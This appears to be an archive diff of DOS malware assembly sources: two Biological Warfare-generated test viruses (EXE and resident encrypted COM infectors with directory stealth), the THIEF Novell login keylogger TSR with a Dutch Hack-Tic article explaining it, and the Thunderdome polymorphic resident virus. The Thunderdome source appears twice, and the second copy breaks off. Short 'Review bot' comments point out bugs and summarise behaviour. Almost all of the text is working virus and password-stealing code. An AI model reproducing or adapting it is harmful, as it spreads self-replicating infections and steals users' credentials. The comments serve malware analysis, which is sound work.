mov ax,4200h ; back to beginning
cwd
xor cx,cx
int 21h
mov ah,40h ; and fix up header
mov cx,28
mov dx,offset read_buffer
int 21h
jmp fix_date_time ; done
courtesy_of db '[BW]',0
signature db 'Test virus #1',0
get_extension:
push ds ; find extension
pop es
mov di,dx
mov cx,64
mov al,'.'
repnz scasb
ret
include bwme.asm
int_24:
mov al,3 ; int 24 handler
iret
mutator dw 106h
new_jump db 0E9h,0,0
virus_end:
VIRUS_SIZE equ virus_end - virus_begin
read_buffer db 28 dup (?) ; read buffer
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
end_heap:
MEM_SIZE equ end_heap - start
code ends
end start

@ -0,0 +1,303 @@
; test2.asm : Test virus #2
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0A6CFh
INFECT equ 2
MARKER equ 08080h
code segment
org 100h
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
push ds es
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
xor ax,ax ; mild anti-trace code
mov es,ax ; kill interrupts 1 & 3
mov di,6
stosw
mov di,14
stosw
in al,21h ; lock out & reopen keyboard
xor al,2
out 21h,al
xor al,2
out 21h,al
push cs
pop ds
lea dx,[bp + offset new_DTA]
mov ah,1Ah
int 21h
mov byte ptr [bp + infections],0
push [bp + exe_cs]
push [bp + exe_ip]
push [bp + exe_ss]
push [bp + exe_sp]
call traverse
call activate
pop [bp + exe_sp]
pop [bp + exe_ss]
pop [bp + exe_ip]
pop [bp + exe_cs]
pop es ds
mov dx,80h
mov ah,1Ah
int 21h
exe_exit:
mov ax,ds ; fix up return address
add ax,10h
push ax
add ax,cs:[bp + exe_cs]
mov cs:[bp + return_cs],ax
mov ax,cs:[bp + exe_ip]
mov cs:[bp + return_ip],ax
pop ax
add ax,cs:[bp + exe_ss] ; restore stack
cli
mov ss,ax
mov sp,cs:[bp + exe_sp]
call fix_regs ; fix up registers
sti
db 0EAh ; back to host program
return_ip dw 0
return_cs dw 0
exe_cs dw -16 ; orig CS:IP
exe_ip dw 103h
exe_sp dw -2 ; orig SS:SP
exe_ss dw -16
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
xor bp,bp
ret
traverse:
sub sp,64 ; allocate stack space
mov si,sp
inc si
mov ah,47h ; get current directory
xor dl,dl
push ds
push ss
pop ds
int 21h
pop ds
dec si
mov byte ptr ss:[si],'\' ; fix directory
next_dir:
call infect_dir
cmp byte ptr [bp + infections],INFECT
je traverse_done
lea dx,[bp + outer] ; repeat in next dir up
mov ah,3Bh
int 21h
jnc next_dir
traverse_done:
add sp,64 ; reset
mov dx,si
push ds
push ss
pop ds
mov ah,3Bh
int 21h
pop ds
ret
infect_dir:
mov ah,4Eh
lea dx,[bp + find_me]
int 21h
jc infect_done
next_file:
lea dx,[bp + new_DTA + 1Eh]
call execute
cmp byte ptr [bp + infections],INFECT
je infect_done
mov ah,4Fh
int 21h
jnc next_file
infect_done:
ret
execute:
push si
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
int 21h
jc cant_open
xchg bx,ax
mov ax,5700h ; save file date/time
int 21h
push cx dx
mov ah,3Fh
mov cx,28
lea dx,[bp + read_buffer]
int 21h
cmp word ptr [bp + read_buffer],'ZM'
je infect_exe ; yes, infect as .EXE
jmp dont_infect
fix_date_time:
pop dx cx
mov ax,5701h ; restore file date/time
int 21h
inc byte ptr [bp + infections]
close:
pop ds dx cx ; restore attributes
call set_attributes
mov ah,3Eh ; close file
int 21h
cant_open:
pop si
ret
set_attributes:
mov ax,4301h
int 21h
ret
dont_infect:
pop cx dx ; can't infect, skip
jmp close
infect_exe:
cmp word ptr [bp + read_buffer + 26],0
jne dont_infect ; overlay, don't infect
cmp word ptr [bp + read_buffer + 16],MARKER
je dont_infect ; infected already
les ax,dword ptr [bp + read_buffer + 20]
mov [bp + exe_cs],es
mov [bp + exe_ip],ax
les ax,dword ptr [bp + read_buffer + 14]
mov [bp + exe_ss],ax
mov [bp + exe_sp],es
mov word ptr [bp + read_buffer + 16],MARKER
mov ax,4202h ; to end of file
cwd
xor cx,cx
int 21h
push ax dx ; save file size
push bx
mov cl,12 ; calculate offsets for CS
shl dx,cl ; and IP
mov bx,ax
mov cl,4
shr bx,cl
add dx,bx
and ax,15
pop bx
sub dx,word ptr [bp + read_buffer + 8]
mov word ptr [bp + read_buffer + 22],dx
mov word ptr [bp + read_buffer + 20],ax
add dx,100h
mov word ptr [bp + read_buffer + 14],dx
pop dx ax ; calculate prog size
add ax,VIRUS_SIZE + 3
adc dx,0
mov cx,512 ; in pages
div cx ; then save results
inc ax
mov word ptr [bp + read_buffer + 2],dx
mov word ptr [bp + read_buffer + 4],ax
mov ah,40h
mov cx,VIRUS_SIZE + 3
lea dx,[bp + virus_begin]
int 21h
mov ax,4200h ; back to beginning
cwd
xor cx,cx
int 21h
mov ah,40h ; and fix up header
mov cx,28
lea dx,[bp + read_buffer]
int 21h
jmp fix_date_time ; done
activate:
; Insert your routine here
ret
courtesy_of db '[BW]',0
signature db 'Test virus #2',0
get_extension:
push ds ; find extension
pop es
mov di,dx
mov cx,64
mov al,'.'
repnz scasb
ret
find_me db '*.EXE',0
outer db '..',0
infections db 0
virus_end:
VIRUS_SIZE equ virus_end - virus_begin
read_buffer db 28 dup (?) ; read buffer
new_DTA db 128 dup(?)
end_heap:
MEM_SIZE equ end_heap - start
code ends
end start

@ -0,0 +1,318 @@
; test3.asm : Test virus #3
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0FA10h
PONG equ 0B8D4h
STAMP equ 31
code segment
org 0
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
db 0BBh ; decryption module
code_offset dw offset virus_code
mov si,VIRUS_SIZE / 2 + 1
db 0B8h
cipher dw 0
decrypt:
xor cs:[bx],ax
add bx,2
dec si
jnz decrypt
virus_code:
push ds es
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
mov ax,PING ; test for residency
int 21h
cmp dx,PONG
je installed
mov ax,es ; Get PSP
dec ax
mov ds,ax ; Get MCB
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
mov es,word ptr ds:[12h]
push cs ; copy virus into memory
pop ds
xor di,di
mov si,bp
mov cx,(virus_end - start) / 2 + 1
rep movsw
xor ax,ax ; capture interrupts
mov ds,ax
mov si,21h * 4 ; get original int 21
mov di,offset old_int_21
movsw
movsw
mov word ptr ds:[si - 4],offset new_int_21
mov ds:[si - 2],es ; and set new int 21
installed:
pop es ds ; restore segregs
com_exit:
lea si,[bp + host] ; restore host program
mov di,100h
push di
movsw
movsb
call fix_regs ; fix up registers
ret ; and leave
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
xor bp,bp
ret
; interrupt 21 handler
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,PING ; residency test
je ping_pong
cmp ah,11h ; directory stealth
je dir_stealth
cmp ah,12h
je dir_stealth
cmp ah,4Eh ; directory stealth
je dir_stealth_2
cmp ah,4Fh
je dir_stealth_2
cmp ax,4B00h ; execute program
jne int_21_exit
jmp execute
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0
ping_pong:
mov dx,PONG
iret
dir_stealth:
call int_21 ; get dir entry
test al,al
js dir_stealth_done
push ax bx es
mov ah,2Fh
int 21h
cmp byte ptr es:[bx],-1 ; check for extended FCB
jne no_ext_FCB
add bx,7
no_ext_FCB:
mov ax,es:[bx + 17h] ; check for infection marker
and al,31
cmp al,STAMP
jne dir_fixed
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
sbb word ptr es:[bx + 1Fh],0
dir_fixed:
pop es bx ax
dir_stealth_done:
iret
dir_stealth_2:
pushf
call dword ptr cs:[old_int_21]
jc dir_stealth_done_2
check_infect2:
push ax bx es
mov ah,2Fh
int 21h
mov ax,es:[bx + 16h]
and al,31 ; check timestamp
cmp al,STAMP
jne fixed_2
sub es:[bx + 1Ah],VIRUS_SIZE + 3
sbb word ptr es:[bx + 1Ch],0
fixed_2:
pop es bx ax
clc ; clear carry
dir_stealth_done_2:
retf 2
execute:
push ax bx cx dx si di ds es
xor ax,ax ; critical error handler
mov es,ax ; routine - catch int 24
mov es:[24h * 4],offset int_24
mov es:[24h * 4 + 2],cs
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
int 21h
jc cant_open
xchg bx,ax
push cs ; CS = DS
pop ds
mov ax,5700h ; save file date/time
int 21h
push cx dx
mov ah,3Fh
mov cx,28
mov dx,offset read_buffer
int 21h
cmp word ptr read_buffer,'ZM' ; .EXE?
je dont_infect ; .EXE, skip
mov al,2 ; move to end of file
call move_file_ptr
cmp dx,65279 - (VIRUS_SIZE + 3)
ja dont_infect ; too big, don't infect
sub dx,VIRUS_SIZE + 3 ; check for previous infection
cmp dx,word ptr read_buffer + 1
je dont_infect
add dx,VIRUS_SIZE + 3
mov word ptr new_jump + 1,dx
add dx,103h
call encrypt_code ; encrypt virus
mov dx,offset read_buffer ; save original program head
int 21h
mov ah,40h ; write virus to file
mov cx,VIRUS_SIZE
mov dx,offset encrypt_buffer
int 21h
xor al,al ; back to beginning of file
call move_file_ptr
mov dx,offset new_jump ; and write new jump
int 21h
fix_date_time:
pop dx cx
and cl,-32 ; add time stamp
or cl,STAMP
mov ax,5701h ; restore file date/time
int 21h
close:
pop ds dx cx ; restore attributes
call set_attributes
mov ah,3Eh ; close file
int 21h
cant_open:
pop es ds di si dx cx bx ax
jmp int_21_exit ; leave
set_attributes:
mov ax,4301h
int 21h
ret
dont_infect:
pop cx dx ; can't infect, skip
jmp close
move_file_ptr:
mov ah,42h ; move file pointer
cwd
xor cx,cx
int 21h
mov dx,ax ; set up registers
mov ah,40h
mov cx,3
ret
courtesy_of db '[BW]',0
signature db 'Test virus #3',0
encrypt_code:
push ax cx
push dx
xor ah,ah ; get time for random number
int 1Ah
mov cipher,dx ; save encryption key
pop cx
add cx,virus_code - virus_begin
mov code_offset,cx ; save code offset
push cs ; ES = CS
pop es
mov si,offset virus_begin ; move decryption module
mov di,offset encrypt_buffer
mov cx,virus_code - virus_begin
rep movsb
mov cx,VIRUS_SIZE / 2 + 1
encrypt:
lodsw ; encrypt virus code
xor ax,dx
stosw
loop encrypt
pop cx ax
ret
int_24:
mov al,3 ; int 24 handler
iret
new_jump db 0E9h,0,0
virus_end:
VIRUS_SIZE equ virus_end - virus_begin
read_buffer db 28 dup (?) ; read buffer
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
end_heap:
MEM_SIZE equ end_heap - start
code ends
end start
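Review bot: The `cant_open` path in `execute` is stack-unbalanced: `push cx dx ds` is done right after the 4300h get-attributes call, but when the 3D02h open fails and `jc cant_open` is taken, `cant_open` pops only the eight registers saved at the top of `execute`, so every register is restored from the wrong slot and control reaches the original INT 21h via `int_21_exit` with SP six bytes off — the host program's IRET then returns to garbage on any open failure. For an archived sample this should at least be flagged in the listing, e.g. `; BUG: cx/dx/ds pushed after the 4300h call are never popped on the cant_open path`. The only documentation is the generator banner, so a short English header would help analysts: COM infector that goes resident by shrinking the MCB, hooks INT 21h with a `PING`/`PONG` residency check and size-stealth on 11h/12h/4Eh/4Fh, marks infected files by forcing the timestamp seconds field to `STAMP` (31), and skips files starting with `ZM` or larger than `65279 - (VIRUS_SIZE + 3)` bytes.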

@ -0,0 +1,269 @@
;redaktie van The Key, John D., Tx, Herman Acker, Peter Poelman, Paul en Rop.
;Nadruk wordt door de redaktie toegestaan!
;------------------------------------------------------------------------------
;
; Als je via een Local Area Network onder MS-DOS files wilt kunnen bewerken
;kun je bijna niet om de Novell networksoftware heen. Of je nou op je werk of
;op school met Novell werkt: je hebt altijd te weinig bevoegdheid op het
;systeem. Hack-Tic helpt je door te dringen in het systeem met dit artikel van
;een anonieme auteur.
;
; THIEF is een TSR (Terminate and Stay Resident; geheugen-resident) programma
;voor de IBM-compatible, geschreven in 8086 machinetaal. Het probeert om
;wachtwoorden voor het Novell PC Local Area Netwerk te stellen. De oorsprong
;van THIEF ligt op een school met een bloeiende hack-cultuur: George Washington
;High School in Denver, Colorado USA.
; Deze school is meer dan goed voorzien van IBM micro's. Vijf lokalen van 30
;computers hangen allemaal via een ethernet aan elkaar. Het netwerk draait
;onder Novell. Vier van de vijf lokalen gebruiken boot-proms [geheugenchips op
;de netwerk-interfacekaart. Zij zorgen ervoor dat er opgestart kan worden
;zonder dat er een disk (of zelfs een drive(!) nodig is op de betreffende
;machine.] voor het opstarten van de PC's. De vijfde ruimte bevat IBM PS/2
;model 80's(!) met harddisks. De systeembeheerders en andere "power-users"
;maken graag gebruik van deze machines. Deze machines "booten" vanaf hun eigen
;hard-disks, zij gebruiken geen boot-proms.
; Op een van deze computers werd THIEF voor het eerst gesignaleerd. THIEF
;maakt namelijk gebruik van een zwakheid in de beveiliging tijdens de bootfase.
;In de AUTOEXEC.BAT file werd een extra regel toegevoegd die een "verborgen"
;programma op de bootschijf activeerde. Zodra er echter een programma met de
;naam LOGIN wordt uitgevoerd komt THIEF tot leven en hij slaat alle
;toetsaanslagen op in een (eveneens verborgen) file op de boot disk. De
;onbevoegde kan later terugkomen en kijken wat zijn val gevangen heeft.
; Voordat we het "metabolisme" van THIEF verder gaan ontleden eerst even de
;zwakheden die deze hack mogelijk maken:
; -Een boot-proces dat veranderd kan worden
; -Fysieke toegang (door een onbevoegde) tot de computer
; Beide zijn goed te verhelpen. Boot-proms en een slot op de deur en klaar is
;Kees.
; Terug naar het "metabolisme". Nogal verassend is dat het programma dezelfde
;"hook" gebruikt als de Novell shell. Het grijpt de centrale toegang naar DOS:
;interrupt 21h [ (hex) wordt door programma's gebruikt om een DOS functie aan te
;roepen. De Novell-Netware shell onderschept deze stroom om zondig zelf op
;bepaalde verzoeken te reageren. ]. Het onderschept alle aanroepen naar DOS.
;Zodra een EXECute file call wordt gemaakt met de filename LOGIN worden alle
;toetsaanslagen vastgelegd totdat het programma terugkeert naar DOS. Tijdens het
;LOGIN process wordt het Novell wachtwoord ingetikt en dus is de hacker een
;wachtwoord rijker. Het is allemaal nog iets te ingewikkeld: het programma had
;ook gewoon op de speciale Novell inlog functieaanroep kunnen wachten.Maar ach,
;zo werkt het ook.
; Dit soort programma's zijn alles behalve nieuw. Ze zijn net zo oud als
;wachtwoord-beveiliging. Bestudering van dit programma geeft meer inzicht in de
;problematiek van LAN-beveiliging.
; De toekomst zal zeker geheel nieuwe identificatietechnieken brengen. Net zo
;zeker is dat zij begroet zullen worden door geduldige, enigszins doortrapte
;genialiteit.
;
; Opmerking: THIEF werd door zijn maker ook wel eens GETIT genoemd. De maker
;was gelukkig onvoorzichtig genoeg om de sourcecode te laten slingeren.
;
;
; DE CODE VAN THIEF:
;
;
cseg segment
assume cs:cseg,ds:cseg
org 100h
public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
public cntr,lits,begin
.RADIX 16
start:
push cs
push cs
push cs
pop ds
pop es
mov ax,0fffeh
CLI
pop ss
mov sp,ax
STI
jmp begin
oi21 dd ?
ac dw 0
ob dw 80h dup (?)
buff2 db 80h dup (?)
fn db 'c:\testing.tmp',0,' '
search1 db 'LOGIN'
foundf db 0
fh dw 0
flag db 0
cntr dw 0
ni21:
assume cs:cseg,ds:nothing,es:nothing
cmp ax,4b00h
je exec
cmp foundf,0ffh
jne nc
cmp ah,8
je oc
cmp ah,7
je oc
nc:
push ax
mov al,cs:flag
not al
cmp al,0
jne jtov
mov ax,cntr
inc ax
mov cntr,ax
cmp ax,31h
jb jtov
xor ax,ax
mov cntr,ax
mov flag,al
pop ax
pushf
call dword ptr [oi21]
push ds
push cs
pop ds
push ax
push bx
push cx
push dx
jmp short wpwtf
jtov:
pop ax
jmp dword ptr cs:[oi21]
exec: call scanfor
jmp nc
oc:
pushf
call dword ptr cs:[oi21]
assume ds:cseg
push ds
push cs
pop ds
push ax
push bx
push cx
push dx
mov bx,ac
mov [bx],al
inc bx
mov [ac],bx
cmp al,0dh
jne lethro
mov byte ptr [bx],0ah
not cs:[flag]
lethro:
pop dx
pop cx
pop bx
pop ax
pop ds
iret
scanfor:
push ax
push di
push si
push es
push ds
push cs
push cs
pop es
mov si,dx
mov di,offset buff2
moveit:
lodsb
and al,0dfh
stosb
or al,al
jnz moveit
pop ds
mov di,offset buff2
look:
push di
mov si,offset search1
mov cx,5
repe cmpsb
pop di
or cx,cx
jz foundit
inc di
cmp byte ptr [di+5],0
je not_found
jmp look
not_found:
xor ax,ax
mov foundf,al
jmp short endofsearch
foundit:
mov ax,0ffh
mov foundf,al
endofsearch:
pop ds
pop es
pop si
pop di
pop ax
ret
wpwtf:
mov ax,3d02h
mov dx,offset fn
pushf
call dword ptr [oi21]
jnc exist
cmp al,2
je create
jmp lethro
create:
mov ah,3ch
mov dx,offset fn
mov cx,02h+04h
pushf
call dword ptr [oi21]
jnc exist
jmp lethro
exist:
mov fh,ax
mov bx,ax
mov ax,4202h
xor cx,cx
xor dx,dx
pushf
call dword ptr [oi21]
mov cx,[ac]
mov dx,offset ob
sub cx,dx
mov [ac],dx
inc cx
mov bx,fh
mov ah,40h
pushf
call dword ptr [oi21]
mov ah,3eh
mov bx,fh
pushf
call dword ptr [oi21]
jmp lethro
lits db 90h
begin:
mov ax,offset ob
mov [ac],ax
mov ax,3521h
int 21h
mov di,offset oi21
mov [di],bx
mov [di+2],es
mov dx,offset ni21
push cs
pop ds
mov ax,2521h
int 21h
mov dx,offset lits
int 27h
cseg ends
end start
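Review bot: The keystroke capture at `oc:` writes into `ob` through the `ac` pointer (`mov bx,ac` / `mov [bx],al` / `inc bx` / `mov [ac],bx`) with no check against the end of the 80h-word buffer, so more than 256 captured bytes before a flush run past `ob` into `buff2` and the `fn` path string; that deserves a comment such as `; NOTE: ac is never bounded by the end of ob — overflow corrupts buff2/fn`. Because the commentary above the code is entirely in Dutch, an English header would help analysts: the TSR hooks INT 21h, arms on an AH=4Bh EXEC whose path contains `LOGIN` (matched after the `and al,0dfh` uppercase fold in `scanfor`), logs the results of AH=07h/08h console-input calls while armed, toggles `flag` on CR, and 31h INT 21h calls later appends the buffer to `c:\testing.tmp`, created with attributes `02h+04h` (hidden+system) — the on-disk artifact worth listing up front. The Dutch article text should stay as provenance but be summarized in English rather than left as the only description.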


@ -0,0 +1,403 @@
;
; Thunderdome virus by John Tardy / TridenT
;
Org 0h
decr: jmp Crypt
db 'Carcass'
Loopje DB 0e2h
db 0fah
DecrLen Equ $-Decr
Crypt: Push Ax
call Get_Ofs
Get_Ofs: pop Bp
sub Bp,Get_Ofs
Mov Ah,2ah
Int 21h
Cmp Cx,1993
Ja Makeya
jb Installed
Cmp Dh,10
Jb installed
Makeya: Mov Ax,0DEADh
Int 21h
Cmp Ax,0AAAAh
Je Installed
mov ax,3521h
int 21h
mov word ptr cs:old21[bp],bx
mov word ptr cs:old21[bp][2],es
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:[0000],'Z'
jne installed
mov ax,word ptr ds:[0003]
sub ax,ParLen
jb installed
mov word ptr ds:[0003],ax
sub word ptr ds:[0012h],ParLen
lea si,decr[bp]
xor di,di
mov es,ds:[12h]
mov ds,cs
mov cx,virlen
rep movsb
mov ax,2521h
mov ds,es
mov dx,offset new21
int 21h
Installed: Mov Di,100h
Push Di
Lea Si,Org_Prg[Bp]
Push Cs
Pop Ds
Push Cs
Pop Es
Movsw
Movsb
Pop Bx
Pop Ax
Jmp Bx
Old21 dd 0
New21: cmp ax,0deadh
jne chkfunc
mov cx,0aaaah
mov ax,cx
iret
chkfunc: cmp ah,12h
je findFCBst
cmp ah,11h
je findfcbst
cmp ah,4fh
je findst
cmp ah,4eh
je findst
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3dh
je infectHan
cmp ah,4bh
je infectHan
cmp ah,41h
je infectHan
cmp ah,43h
je infectHan
cmp ah,56h
je infectHan
cmp ah,0fh
je infectFCB
cmp ah,23h
je infectFCB
cmp ah,6ch
je infectdos4
jmp endint
findfcbst: jmp findfcb
findst: jmp find
InfectFCB: mov si,dx
lodsb
push cs
pop es
lea di,fnam
mov cx,8
rep movsb
mov cx,3
inc di
rep movsb
lea dx,fnam
push cs
pop ds
InfectHan: mov si,dx
mov cx,100h
findpnt: lodsb
cmp al,'.'
je chkcom
loop findpnt
jmp endi
infectdos4: and dx,0fh
cmp dx,1
jne endi
mov dx,si
jmp infecthan
chkcom: lodsw
or ax,2020h
cmp ax,'oc'
jne endi
lodsb
or al,20h
cmp al,'m'
je doitj
endi: jmp endint
doitj: push dx
push ds
mov ax,4300h
call dos
mov cs:fatr,cx
mov ax,4301h
sub cx,cx
call dos
mov ax,3d02h
call dos
jnc getdate
jmp error
getdate: mov bx,5700h
xchg ax,bx
call dos
mov cs:fdat,cx
mov cs:fdat+2,dx
and cx,1fh
cmp cx,1fh
jne chkexe
jmp done
chkexe: mov ah,3fh
push cs
pop ds
lea dx,Org_prg
mov cx,3
call dos
cmp word ptr cs:Org_prg[0],'MZ'
je close
cmp word ptr cs:Org_prg[0],'ZM'
je close
Mov ax,4202h
sub cx,cx
cwd
call dos
sub ax,3
mov cs:jump[1],ax
Add Ax,Offset Crypt+103h
Mov S_1[1],Ax
Mov S_2[1],Ax
Mov S_3[4],Ax
Mov S_4[4],Ax
Call GenPoly
mov ah,40h
push cs
pop ds
lea dx,coder
mov cx,virlen
call dos
mov ax,4200h
xor cx,cx
cwd
call dos
mov ah,40h
lea dx,jump
mov cx,3
call dos
or cs:fdat,01fh
close: mov ax,5701h
mov cx,cs:fdat
mov dx,cs:fdat[2]
call dos
done: mov ah,3eh
call dos
pop ds
pop dx
push dx
push ds
mov ax,4301h
mov cx,fatr
call dos
error: pop ds
pop dx
endint: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp d ptr cs:[old21]
GenPoly: Xor Byte Ptr [Loopje],2
Xor Ax,Ax
Mov Es,Ax
Mov Ax,Es:[46ch]
Mov Es,Cs
Push Ax
And Ax,07ffh
Add Ax,CryptLen
Mov S_1[4],Ax
Mov S_2[4],Ax
Mov S_3[1],Ax
Mov S_4[1],Ax
Doit: Pop Ax
Push Ax
And Ax,3
Shl Ax,1
Mov Si,Ax
Mov Ax,W Table[Si]
Mov Si,Ax
Lea Di,decr
Movsw
Movsw
Movsw
Movsw
Pop Ax
Stosb
Movsb
Mov Dl,Al
Lea Si,Decr
Lea Di,Coder
Mov Cx,DecrLen
Rep Movsb
Lea Si,Crypt
Mov Cx,CryptLen
Encrypt: Lodsb
Xor Al,Dl
Stosb
Loop Encrypt
Cmp Dl,0
Je Fuckit
Ret
FuckIt: Lea Si,Encr0
Lea Di,Coder
Mov Cx,Encr0Len
Rep Movsb
Mov Ax,Cs:jump[1]
Add Ax,Encr0Len+2
Mov Cs:jump[1],Ax
Ret
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
Db 13,10,'Greetings go to all other virus writers!'
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
S_1: Lea Si,0
Mov Cx,0
DB 80h,34h
Inc Si
S_2: Lea Di,0
Mov Cx,0
DB 80h,35h
Inc Di
S_3: Mov Cx,0
Lea Si,0
DB 80h,34h
Inc Si
S_4: Mov Cx,0
Lea Di,0
DB 80h,35h
Inc Di
Db '[ "Thunderdome" virus by '
Encr0 Db 'John Tardy'
Encr0Len Equ $-Encr0
Db ' / TridenT ]'
getdta: pop si
pushf
push ax
push bx
push es
mov ah,2fh
call dos
jmp short si
FindFCB: call DOS
cmp al,0
jne Ret1
call getdta
cmp byte ptr es:[bx],-1
jne FCBOk
add bx,8
FCBOk: mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ch],Virlen
sbb word ptr es:[bx+1eh],0
jmp short Time
Find: call DOS
jc Ret1
call getdta
mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ah],VirLen
sbb word ptr es:[bx+1ch],0
Time: xor byte ptr es:[bx+16h],10h
FileOk: pop es
pop bx
pop ax
popf
Ret1: retf 2
dos: pushf
call dword ptr cs:[old21]
ret
Org_prg dw 0cd90h
db 20h
fnam db 8 dup (0)
db '.'
db 3 dup (0)
db 0
fatr dw 0
fdat dw 0,0
jump db 0e9h,0,0
ResLen Equ ($-Decr)/10h
ParLen Equ (Reslen*2)+10h
CryptLen Equ $-Crypt
VirLen Equ $-Decr
Coder Equ $
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
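Review bot: This listing does not assemble as uploaded: `mov ds,cs` in the install code and `Mov Es,Cs` in `GenPoly` have no segment-to-segment MOV encoding on x86, and `jmp d ptr cs:[old21]` and `Mov Ax,W Table[Si]` use `d`/`W` size aliases that are defined nowhere in the file, presumably from a lost include or macro file. A header comment stating this would spare analysts a rebuild attempt, e.g. `; NOTE: archived listing does not assemble — mov sreg,sreg at two sites and undefined d/W size aliases`. The header should also record the visible behaviour: resident COM infector that installs only when the date is past 1993, or in 1993 from month 10 on (`Cmp Cx,1993` / `Cmp Dh,10`), answers an `0DEADh`/`0AAAAh` residency handshake, marks infected files by forcing the timestamp seconds field to 1Fh (`or cs:fdat,01fh`), and prepends one of four XOR decryptor templates from `Table` keyed from the BIOS tick count at 0000:046Ch.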

@ -0,0 +1,403 @@
;
; Thunderdome virus by John Tardy / TridenT
;
Org 0h
decr: jmp Crypt
db 'Carcass'
Loopje DB 0e2h
db 0fah
DecrLen Equ $-Decr
Crypt: Push Ax
call Get_Ofs
Get_Ofs: pop Bp
sub Bp,Get_Ofs
Mov Ah,2ah
Int 21h
Cmp Cx,1993
Ja Makeya
jb Installed
Cmp Dh,10
Jb installed
Makeya: Mov Ax,0DEADh
Int 21h
Cmp Ax,0AAAAh
Je Installed
mov ax,3521h
int 21h
mov word ptr cs:old21[bp],bx
mov word ptr cs:old21[bp][2],es
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:[0000],'Z'
jne installed
mov ax,word ptr ds:[0003]
sub ax,ParLen
jb installed
mov word ptr ds:[0003],ax
sub word ptr ds:[0012h],ParLen
lea si,decr[bp]
xor di,di
mov es,ds:[12h]
mov ds,cs
mov cx,virlen
rep movsb
mov ax,2521h
mov ds,es
mov dx,offset new21
int 21h
Installed: Mov Di,100h
Push Di
Lea Si,Org_Prg[Bp]
Push Cs
Pop Ds
Push Cs
Pop Es
Movsw
Movsb
Pop Bx
Pop Ax
Jmp Bx
Old21 dd 0
New21: cmp ax,0deadh
jne chkfunc
mov cx,0aaaah
mov ax,cx
iret
chkfunc: cmp ah,12h
je findFCBst
cmp ah,11h
je findfcbst
cmp ah,4fh
je findst
cmp ah,4eh
je findst
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3dh
je infectHan
cmp ah,4bh
je infectHan
cmp ah,41h
je infectHan
cmp ah,43h
je infectHan
cmp ah,56h
je infectHan
cmp ah,0fh
je infectFCB
cmp ah,23h
je infectFCB
cmp ah,6ch
je infectdos4
jmp endint
findfcbst: jmp findfcb
findst: jmp find
InfectFCB: mov si,dx
lodsb
push cs
pop es
lea di,fnam
mov cx,8
rep movsb
mov cx,3
inc di
rep movsb
lea dx,fnam
push cs
pop ds
InfectHan: mov si,dx
mov cx,100h
findpnt: lodsb
cmp al,'.'
je chkcom
loop findpnt
jmp endi
infectdos4: and dx,0fh
cmp dx,1
jne endi
mov dx,si
jmp infecthan
chkcom: lodsw
or ax,2020h
cmp ax,'oc'
jne endi
lodsb
or al,20h
cmp al,'m'
je doitj
endi: jmp endint
doitj: push dx
push ds
mov ax,4300h
call dos
mov cs:fatr,cx
mov ax,4301h
sub cx,cx
call dos
mov ax,3d02h
call dos
jnc getdate
jmp error
getdate: mov bx,5700h
xchg ax,bx
call dos
mov cs:fdat,cx
mov cs:fdat+2,dx
and cx,1fh
cmp cx,1fh
jne chkexe
jmp done
chkexe: mov ah,3fh
push cs
pop ds
lea dx,Org_prg
mov cx,3
call dos
cmp word ptr cs:Org_prg[0],'MZ'
je close
cmp word ptr cs:Org_prg[0],'ZM'
je close
Mov ax,4202h
